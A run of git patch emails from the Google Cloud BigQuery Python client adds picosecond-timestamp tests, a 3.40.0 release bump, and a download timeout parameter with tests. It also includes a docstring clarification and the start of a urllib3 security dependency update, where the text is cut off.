google.cloud.bigquery.retry @@ -5214,6 +5214,56 @@ def test_query_w_query_parameters(self): }, ) + def test_query_pico_timestamp(self): + query = "select *;" + response = { + "jobReference": { + "projectId": self.PROJECT, + "location": "EU", + "jobId": "abcd", + }, + } + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + conn = client._connection = make_connection(response) + + client.query( + query, + location="EU", + api_method="QUERY", + timestamp_precision=TimestampPrecision.PICOSECOND, + ) + + # Check that query actually starts the job. + expected_resource = { + "query": query, + "useLegacySql": False, + "location": "EU", + "formatOptions": {"timestampOutputFormat": "ISO8601_STRING"}, + "requestId": mock.ANY, + } + conn.api_request.assert_called_once_with( + method="POST", + path=f"/projects/{self.PROJECT}/queries", + data=expected_resource, + timeout=None, + ) + + def test_query_pico_timestamp_insert_error(self): + query = "select *;" + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + + with pytest.raises(ValueError, match="Picosecond Timestamp is only"): + client.query( + query, + location="EU", + api_method="INSERT", + timestamp_precision=TimestampPrecision.PICOSECOND, + ) + def test_query_job_rpc_fail_w_random_error(self): from google.api_core.exceptions import Unknown from google.cloud.bigquery.job import QueryJob @@ -6817,6 +6867,39 @@ def test_list_rows(self): timeout=7.5, ) + def test_list_rows_pico_timestamp(self): + from google.cloud.bigquery.schema import SchemaField + from google.cloud.bigquery.table import Table + + PATH = "projects/%s/datasets/%s/tables/%s/data" % ( + self.PROJECT, + self.DS_ID, + self.TABLE_ID, + ) + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + conn = client._connection = make_connection({}, {}) + pico_col = SchemaField( + "full_name", + "TIMESTAMP", + mode="REQUIRED", + timestamp_precision=TimestampPrecision.PICOSECOND, + ) + table = Table(self.TABLE_REF, schema=[pico_col]) + + iterator = client.list_rows( + table, timestamp_precision=TimestampPrecision.PICOSECOND + ) + next(iterator.pages) + + conn.api_request.assert_called_once_with( + method="GET", + path="/%s" % PATH, + query_params={"formatOptions.timestampOutputFormat": "ISO8601_STRING"}, + timeout=None, + ) + def test_list_rows_w_start_index_w_page_size(self): from google.cloud.bigquery.schema import SchemaField from google.cloud.bigquery.table import Table From 40b4cbf5d1948b1a557fbb52dc7d9ff5334590d4 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Wed, 7 Jan 2026 16:44:07 -0800 Subject: [PATCH 194/202] chore: librarian release pull request: 20260108T001607Z (#2355) PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release. Librarian Version: v0.7.0 Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
google-cloud-bigquery: 3.40.0 ## [3.40.0](https://github.com/googleapis/python-bigquery/compare/v3.39.0...v3.40.0) (2026-01-08) ### Features * support load_table and list_rows with picosecond timestamp (#2351) ([46764a59](https://github.com/googleapis/python-bigquery/commit/46764a59)) * support timestamp_precision in table schema (#2333) ([8d5785ae](https://github.com/googleapis/python-bigquery/commit/8d5785ae))
--- .librarian/state.yaml | 2 +- CHANGELOG.md | 8 ++++++++ google/cloud/bigquery/version.py | 2 +- 3 files changed, 10 insertions(+), 2 deletions(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index 8d67105e3..71bcf16ad 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,7 +1,7 @@ image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery - version: 3.39.0 + version: 3.40.0 last_generated_commit: "" apis: [] source_roots: diff --git a/CHANGELOG.md b/CHANGELOG.md index 4cf177cc5..242165933 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,6 +4,14 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.40.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.39.0...google-cloud-bigquery-v3.40.0) (2026-01-08) + + +### Features + +* support load_table and list_rows with picosecond timestamp (#2351) ([46764a59ca7a21ed14ad2c91eb7f98c302736c22](https://github.com/googleapis/google-cloud-python/commit/46764a59ca7a21ed14ad2c91eb7f98c302736c22)) +* support timestamp_precision in table schema (#2333) ([8d5785aea50b9f9e5b13bd4c91e8a08d6dac7778](https://github.com/googleapis/google-cloud-python/commit/8d5785aea50b9f9e5b13bd4c91e8a08d6dac7778)) + ## [3.39.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.38.0...google-cloud-bigquery-v3.39.0) (2025-12-12) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 1d5e35889..6b0fa0fba 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.39.0" +__version__ = "3.40.0" From 4f67ba20b49159e81f645ed98e401b9bb1359c1a Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 8 Jan 2026 18:25:23 -0500 Subject: [PATCH 195/202] =?UTF-8?q?fix:=20add=20timeout=20parameter=20to?= =?UTF-8?q?=20to=5Fdataframe=20and=20to=5Farrow=20met=E2=80=A6=20(#2354)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ### Description This PR adds a `timeout` parameter to the `to_dataframe()` and `to_arrow()` methods (and their corresponding `*_iterable`, `*_geodataframe` and `QueryJob` wrappers) in the BigQuery client library. This addresses an issue where these methods could hang indefinitely if the underlying BigQuery Storage API stream blocked (e.g., due to firewall issues or network interruptions) during the download phase. The added `timeout` parameter ensures that the download operation respects the specified time limit and raises a `concurrent.futures.TimeoutError` if it exceeds the duration. ### Changes - Modified `google/cloud/bigquery/_pandas_helpers.py`: - Updated `_download_table_bqstorage` to accept a `timeout` argument. - Implemented a timeout check within the result processing loop. - Updated wrapper functions `download_dataframe_bqstorage` and `download_arrow_bqstorage` to accept and pass the `timeout` parameter. - Modified `google/cloud/bigquery/table.py`: - Updated `RowIterator` methods (`to_arrow_iterable`, `to_arrow`, `to_dataframe_iterable`, `to_dataframe`, `to_geodataframe`) to accept and pass `timeout`. - Updated `_EmptyRowIterator` methods to match the `RowIterator` signature, preventing `TypeError` when a timeout is provided for empty result sets. - Modified `google/cloud/bigquery/job/query.py`: - Updated `QueryJob` methods (`to_arrow`, `to_dataframe`, `to_geodataframe`) to accept `timeout` and pass it to the result iterator. - Updated unit tests in `tests/unit/job/test_query_pandas.py`, `tests/unit/test_table.py`, and `tests/unit/test_table_pandas.py` to reflect the signature changes. Fixes internal bug: b/468091307 --- google/cloud/bigquery/_pandas_helpers.py | 126 ++++++++++++++--------- google/cloud/bigquery/job/query.py | 17 +++ google/cloud/bigquery/table.py | 44 +++++++- tests/unit/job/test_query_pandas.py | 33 ++++++ tests/unit/test__pandas_helpers.py | 75 ++++++++++++++ tests/unit/test_table.py | 15 +++ tests/unit/test_table_pandas.py | 2 + 7 files changed, 257 insertions(+), 55 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 2dab03a06..5460f7ca7 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -26,6 +26,7 @@ import logging import queue import threading +import time import warnings from typing import Any, Union, Optional, Callable, Generator, List @@ -869,6 +870,7 @@ def _download_table_bqstorage( max_queue_size: Any = _MAX_QUEUE_SIZE_DEFAULT, max_stream_count: Optional[int] = None, download_state: Optional[_DownloadState] = None, + timeout: Optional[float] = None, ) -> Generator[Any, None, None]: """Downloads a BigQuery table using the BigQuery Storage API. @@ -899,6 +901,9 @@ def _download_table_bqstorage( download_state (Optional[_DownloadState]): A threadsafe state object which can be used to observe the behavior of the worker threads created by this method. + timeout (Optional[float]): + The number of seconds to wait for the download to complete. + If None, wait indefinitely. Yields: pandas.DataFrame: Pandas DataFrames, one for each chunk of data @@ -906,6 +911,8 @@ def _download_table_bqstorage( Raises: ValueError: If attempting to read from a specific partition or snapshot. + concurrent.futures.TimeoutError: + If the download does not complete within the specified timeout. Note: This method requires the `google-cloud-bigquery-storage` library @@ -973,60 +980,73 @@ def _download_table_bqstorage( worker_queue: queue.Queue[int] = queue.Queue(maxsize=max_queue_size) - with concurrent.futures.ThreadPoolExecutor(max_workers=total_streams) as pool: - try: - # Manually submit jobs and wait for download to complete rather - # than using pool.map because pool.map continues running in the - # background even if there is an exception on the main thread. - # See: https://github.com/googleapis/google-cloud-python/pull/7698 - not_done = [ - pool.submit( - _download_table_bqstorage_stream, - download_state, - bqstorage_client, - session, - stream, - worker_queue, - page_to_item, - ) - for stream in session.streams - ] - - while not_done: - # Don't block on the worker threads. For performance reasons, - # we want to block on the queue's get method, instead. This - # prevents the queue from filling up, because the main thread - # has smaller gaps in time between calls to the queue's get - # method. For a detailed explanation, see: - # https://friendliness.dev/2019/06/18/python-nowait/ - done, not_done = _nowait(not_done) - for future in done: - # Call result() on any finished threads to raise any - # exceptions encountered. - future.result() + # Manually manage the pool to control shutdown behavior on timeout. + pool = concurrent.futures.ThreadPoolExecutor(max_workers=max(1, total_streams)) + wait_on_shutdown = True + start_time = time.time() - try: - frame = worker_queue.get(timeout=_PROGRESS_INTERVAL) - yield frame - except queue.Empty: # pragma: NO COVER - continue + try: + # Manually submit jobs and wait for download to complete rather + # than using pool.map because pool.map continues running in the + # background even if there is an exception on the main thread. + # See: https://github.com/googleapis/google-cloud-python/pull/7698 + not_done = [ + pool.submit( + _download_table_bqstorage_stream, + download_state, + bqstorage_client, + session, + stream, + worker_queue, + page_to_item, + ) + for stream in session.streams + ] + + while not_done: + # Check for timeout + if timeout is not None: + elapsed = time.time() - start_time + if elapsed > timeout: + wait_on_shutdown = False + raise concurrent.futures.TimeoutError( + f"Download timed out after {timeout} seconds." + ) + + # Don't block on the worker threads. For performance reasons, + # we want to block on the queue's get method, instead. This + # prevents the queue from filling up, because the main thread + # has smaller gaps in time between calls to the queue's get + # method. For a detailed explanation, see: + # https://friendliness.dev/2019/06/18/python-nowait/ + done, not_done = _nowait(not_done) + for future in done: + # Call result() on any finished threads to raise any + # exceptions encountered. + future.result() + + try: + frame = worker_queue.get(timeout=_PROGRESS_INTERVAL) + yield frame + except queue.Empty: # pragma: NO COVER + continue - # Return any remaining values after the workers finished. - while True: # pragma: NO COVER - try: - frame = worker_queue.get_nowait() - yield frame - except queue.Empty: # pragma: NO COVER - break - finally: - # No need for a lock because reading/replacing a variable is - # defined to be an atomic operation in the Python language - # definition (enforced by the global interpreter lock). - download_state.done = True + # Return any remaining values after the workers finished. + while True: # pragma: NO COVER + try: + frame = worker_queue.get_nowait() + yield frame + except queue.Empty: # pragma: NO COVER + break + finally: + # No need for a lock because reading/replacing a variable is + # defined to be an atomic operation in the Python language + # definition (enforced by the global interpreter lock). + download_state.done = True - # Shutdown all background threads, now that they should know to - # exit early. - pool.shutdown(wait=True) + # Shutdown all background threads, now that they should know to + # exit early. + pool.shutdown(wait=wait_on_shutdown) def download_arrow_bqstorage( @@ -1037,6 +1057,7 @@ def download_arrow_bqstorage( selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, max_stream_count=None, + timeout=None, ): return _download_table_bqstorage( project_id, @@ -1047,6 +1068,7 @@ def download_arrow_bqstorage( page_to_item=_bqstorage_page_to_arrow, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) @@ -1060,6 +1082,7 @@ def download_dataframe_bqstorage( selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, max_stream_count=None, + timeout=None, ): page_to_item = functools.partial(_bqstorage_page_to_dataframe, column_names, dtypes) return _download_table_bqstorage( @@ -1071,6 +1094,7 @@ def download_dataframe_bqstorage( page_to_item=page_to_item, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 38b8a7148..e82deb1ef 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1857,6 +1857,7 @@ def to_arrow( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, create_bqstorage_client: bool = True, max_results: Optional[int] = None, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create a class:`pyarrow.Table` by loading all pages of a table or query. @@ -1904,6 +1905,10 @@ def to_arrow( .. versionadded:: 2.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pyarrow.Table A :class:`pyarrow.Table` populated with row data and column @@ -1921,6 +1926,7 @@ def to_arrow( progress_bar_type=progress_bar_type, bqstorage_client=bqstorage_client, create_bqstorage_client=create_bqstorage_client, + timeout=timeout, ) # If changing the signature of this method, make sure to apply the same @@ -1949,6 +1955,7 @@ def to_dataframe( range_timestamp_dtype: Union[ Any, None ] = DefaultPandasDTypes.RANGE_TIMESTAMP_DTYPE, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Return a pandas DataFrame from a QueryJob @@ -2141,6 +2148,10 @@ def to_dataframe( .. versionadded:: 3.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A :class:`~pandas.DataFrame` populated with row data @@ -2174,6 +2185,7 @@ def to_dataframe( range_date_dtype=range_date_dtype, range_datetime_dtype=range_datetime_dtype, range_timestamp_dtype=range_timestamp_dtype, + timeout=timeout, ) # If changing the signature of this method, make sure to apply the same @@ -2191,6 +2203,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "geopandas.GeoDataFrame": """Return a GeoPandas GeoDataFrame from a QueryJob @@ -2269,6 +2282,9 @@ def to_geodataframe( then the data type will be ``numpy.dtype("object")``. BigQuery String type can be found at: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#string_type + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. Returns: geopandas.GeoDataFrame: @@ -2296,6 +2312,7 @@ def to_geodataframe( int_dtype=int_dtype, float_dtype=float_dtype, string_dtype=string_dtype, + timeout=timeout, ) def __iter__(self): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 5efcb1958..195461006 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2087,6 +2087,7 @@ def to_arrow_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pyarrow.RecordBatch"]: """[Beta] Create an iterable of class:`pyarrow.RecordBatch`, to process the table as a stream. @@ -2127,6 +2128,10 @@ def to_arrow_iterable( setting this parameter value to a value > 0 can help reduce system resource consumption. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pyarrow.RecordBatch: A generator of :class:`~pyarrow.RecordBatch`. @@ -2144,6 +2149,7 @@ def to_arrow_iterable( selected_fields=self._selected_fields, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) tabledata_list_download = functools.partial( _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema @@ -2161,6 +2167,7 @@ def to_arrow( progress_bar_type: Optional[str] = None, bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, create_bqstorage_client: bool = True, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create a class:`pyarrow.Table` by loading all pages of a table or query. @@ -2202,6 +2209,9 @@ def to_arrow( This argument does nothing if ``bqstorage_client`` is supplied. .. versionadded:: 1.24.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. Returns: pyarrow.Table @@ -2236,7 +2246,7 @@ def to_arrow( record_batches = [] for record_batch in self.to_arrow_iterable( - bqstorage_client=bqstorage_client + bqstorage_client=bqstorage_client, timeout=timeout ): record_batches.append(record_batch) @@ -2271,6 +2281,7 @@ def to_dataframe_iterable( dtypes: Optional[Dict[str, Any]] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -2317,6 +2328,10 @@ def to_dataframe_iterable( setting this parameter value to a value > 0 can help reduce system resource consumption. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A generator of :class:`~pandas.DataFrame`. @@ -2344,6 +2359,7 @@ def to_dataframe_iterable( selected_fields=self._selected_fields, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) tabledata_list_download = functools.partial( _pandas_helpers.download_dataframe_row_iterator, @@ -2381,6 +2397,7 @@ def to_dataframe( range_timestamp_dtype: Union[ Any, None ] = DefaultPandasDTypes.RANGE_TIMESTAMP_DTYPE, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create a pandas DataFrame by loading all pages of a query. @@ -2577,6 +2594,10 @@ def to_dataframe( .. versionadded:: 3.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A :class:`~pandas.DataFrame` populated with row data and column @@ -2690,6 +2711,7 @@ def to_dataframe( progress_bar_type=progress_bar_type, bqstorage_client=bqstorage_client, create_bqstorage_client=create_bqstorage_client, + timeout=timeout, ) # Default date dtype is `db_dtypes.DateDtype()` that could cause out of bounds error, @@ -2768,6 +2790,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "geopandas.GeoDataFrame": """Create a GeoPandas GeoDataFrame by loading all pages of a query. @@ -2902,6 +2925,7 @@ def to_geodataframe( int_dtype=int_dtype, float_dtype=float_dtype, string_dtype=string_dtype, + timeout=timeout, ) return geopandas.GeoDataFrame( @@ -2917,9 +2941,6 @@ class _EmptyRowIterator(RowIterator): statements. """ - pages = () - total_rows = 0 - def __init__( self, client=None, api_request=None, path=None, schema=(), *args, **kwargs ): @@ -2931,12 +2952,14 @@ def __init__( *args, **kwargs, ) + self._total_rows = 0 def to_arrow( self, progress_bar_type=None, bqstorage_client=None, create_bqstorage_client=True, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create an empty class:`pyarrow.Table`. @@ -2944,6 +2967,7 @@ def to_arrow( progress_bar_type (str): Ignored. Added for compatibility with RowIterator. bqstorage_client (Any): Ignored. Added for compatibility with RowIterator. create_bqstorage_client (bool): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pyarrow.Table: An empty :class:`pyarrow.Table`. @@ -2970,6 +2994,7 @@ def to_dataframe( range_date_dtype=None, range_datetime_dtype=None, range_timestamp_dtype=None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. @@ -2990,6 +3015,7 @@ def to_dataframe( range_date_dtype (Any): Ignored. Added for compatibility with RowIterator. range_datetime_dtype (Any): Ignored. Added for compatibility with RowIterator. range_timestamp_dtype (Any): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. @@ -3008,6 +3034,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. @@ -3021,6 +3048,7 @@ def to_geodataframe( int_dtype (Any): Ignored. Added for compatibility with RowIterator. float_dtype (Any): Ignored. Added for compatibility with RowIterator. string_dtype (Any): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. @@ -3038,6 +3066,7 @@ def to_dataframe_iterable( dtypes: Optional[Dict[str, Any]] = None, max_queue_size: Optional[int] = None, max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pandas.DataFrame"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -3056,6 +3085,9 @@ def to_dataframe_iterable( max_stream_count: Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pandas.DataFrame`. @@ -3071,6 +3103,7 @@ def to_arrow_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: Optional[int] = None, max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pyarrow.RecordBatch"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -3086,6 +3119,9 @@ def to_arrow_iterable( max_stream_count: Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pyarrow.RecordBatch`. """ diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index a6c59b158..4390309f1 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -1023,5 +1023,38 @@ def test_query_job_to_geodataframe_delegation(wait_for_query): int_dtype=DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) assert df is row_iterator.to_geodataframe.return_value + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@mock.patch("google.cloud.bigquery.job.query.wait_for_query") +def test_query_job_to_dataframe_delegation(wait_for_query): + job = _make_job() + bqstorage_client = object() + timeout = 123.45 + + job.to_dataframe(bqstorage_client=bqstorage_client, timeout=timeout) + + wait_for_query.assert_called_once_with(job, None, max_results=None) + row_iterator = wait_for_query.return_value + row_iterator.to_dataframe.assert_called_once() + call_args = row_iterator.to_dataframe.call_args + assert call_args.kwargs["timeout"] == timeout + + +@pytest.mark.skipif(pyarrow is None, reason="Requires `pyarrow`") +@mock.patch("google.cloud.bigquery.job.query.wait_for_query") +def test_query_job_to_arrow_delegation(wait_for_query): + job = _make_job() + bqstorage_client = object() + timeout = 123.45 + + job.to_arrow(bqstorage_client=bqstorage_client, timeout=timeout) + + wait_for_query.assert_called_once_with(job, None, max_results=None) + row_iterator = wait_for_query.return_value + row_iterator.to_arrow.assert_called_once() + call_args = row_iterator.to_arrow.call_args + assert call_args.kwargs["timeout"] == timeout diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index bc94f5f54..a1cbb726b 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -13,12 +13,14 @@ # limitations under the License. import collections +import concurrent.futures import datetime import decimal import functools import gc import operator import queue +import time from typing import Union from unittest import mock import warnings @@ -2177,3 +2179,76 @@ def test_determine_requested_streams_invalid_max_stream_count(): """Tests that a ValueError is raised if max_stream_count is negative.""" with pytest.raises(ValueError): determine_requested_streams(preserve_order=False, max_stream_count=-1) + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires google-cloud-bigquery-storage" +) +def test__download_table_bqstorage_w_timeout_error(module_under_test): + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + from unittest import mock + + mock_bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + fake_session = mock.Mock(streams=[mock.Mock()]) + mock_bqstorage_client.create_read_session.return_value = fake_session + + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + + def slow_download_stream( + download_state, bqstorage_client, session, stream, worker_queue, page_to_item + ): + # Block until the main thread sets done=True (which it will on timeout) + while not download_state.done: + time.sleep(0.01) + + with mock.patch.object( + module_under_test, "_download_table_bqstorage_stream", new=slow_download_stream + ): + # Use a very small timeout + result_gen = module_under_test._download_table_bqstorage( + "some-project", table_ref, mock_bqstorage_client, timeout=0.01 + ) + with pytest.raises(concurrent.futures.TimeoutError, match="timed out"): + list(result_gen) + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires google-cloud-bigquery-storage" +) +def test__download_table_bqstorage_w_timeout_success(module_under_test): + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + from unittest import mock + + mock_bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + fake_session = mock.Mock(streams=["stream/s0"]) + mock_bqstorage_client.create_read_session.return_value = fake_session + + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + + def fast_download_stream( + download_state, bqstorage_client, session, stream, worker_queue, page_to_item + ): + worker_queue.put("result_page") + + with mock.patch.object( + module_under_test, "_download_table_bqstorage_stream", new=fast_download_stream + ): + # Use a generous timeout + result_gen = module_under_test._download_table_bqstorage( + "some-project", table_ref, mock_bqstorage_client, timeout=10.0 + ) + results = list(result_gen) + + assert results == ["result_page"] diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index af31d116b..97a1b4916 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2495,6 +2495,20 @@ def test_to_geodataframe(self): else: assert not hasattr(df, "crs") + def test_methods_w_timeout(self): + pytest.importorskip("pyarrow") + pytest.importorskip("geopandas") + # Ensure that the timeout parameter is accepted by all methods without raising a TypeError, + # even though the _EmptyRowIterator implementations do not use the timeout value. + timeout = 42.0 + + # Call each type to ensure no TypeError is raised + self._make_one().to_arrow(timeout=timeout) + self._make_one().to_arrow_iterable(timeout=timeout) + self._make_one().to_dataframe(timeout=timeout) + self._make_one().to_dataframe_iterable(timeout=timeout) + self._make_one().to_geodataframe(timeout=timeout) + class TestRowIterator(unittest.TestCase): PYARROW_MINIMUM_VERSION = str(_versions_helpers._MIN_PYARROW_VERSION) @@ -5665,6 +5679,7 @@ def test_rowiterator_to_geodataframe_delegation(self, to_dataframe): int_dtype=DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) self.assertIsInstance(df, geopandas.GeoDataFrame) diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index a4fa3fa39..64d8b1451 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -301,6 +301,7 @@ def test_rowiterator_to_geodataframe_with_default_dtypes( int_dtype=bigquery.enums.DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) mock_geopandas.GeoDataFrame.assert_called_once_with( mock_df, crs="EPSG:4326", geometry="geo_col" @@ -358,6 +359,7 @@ def test_rowiterator_to_geodataframe_with_custom_dtypes( int_dtype=custom_int_dtype, float_dtype=custom_float_dtype, string_dtype=custom_string_dtype, + timeout=None, ) mock_geopandas.GeoDataFrame.assert_called_once_with( mock_df, crs="EPSG:4326", geometry="geo_col" From 73228432a3c821db05d898ea4a4788adf15b033d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 12 Jan 2026 12:09:58 -0600 Subject: [PATCH 196/202] =?UTF-8?q?docs:=20clarify=20that=20only=20jobs.qu?= =?UTF-8?q?ery=20and=20jobs.getQueryResults=20are=20affec=E2=80=A6=20(#234?= =?UTF-8?q?9)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit …ted by page_size in query_and_wait Fixes internal issue b/433324499 Thank you for opening a Pull Request! Before submitting your PR, there are a few things you can do to make sure it goes smoothly: - [ ] Make sure to open an issue as a [bug/issue](https://github.com/googleapis/python-bigquery/issues/new/choose) before writing your code! That way we can discuss the change, evaluate designs, and agree on the general idea - [ ] Ensure the tests and linter pass - [ ] Code coverage does not decrease (if any source code was changed) - [ ] Appropriate docs were updated (if necessary) Fixes # πŸ¦• Co-authored-by: Lingqing Gan --- google/cloud/bigquery/client.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index e3a3cdb11..54c8886cd 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3655,6 +3655,11 @@ def query_and_wait( page_size (Optional[int]): The maximum number of rows in each page of results from the initial jobs.query request. Non-positive values are ignored. + + This parameter only affects the jobs.query and + jobs.getQueryResults API calls. Large results downloaded with + the BigQuery Storage Read API are intentionally unaffected + by this parameter. max_results (Optional[int]): The maximum total number of rows from this request. From 7b8ceea975a2e945eacb0a32c5946ff10e9fe20e Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 21 Jan 2026 21:53:03 +0000 Subject: [PATCH 197/202] chore(deps): update dependency urllib3 to v2.6.3 [security] (#2357) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.6.0` β†’ `==2.6.3` | 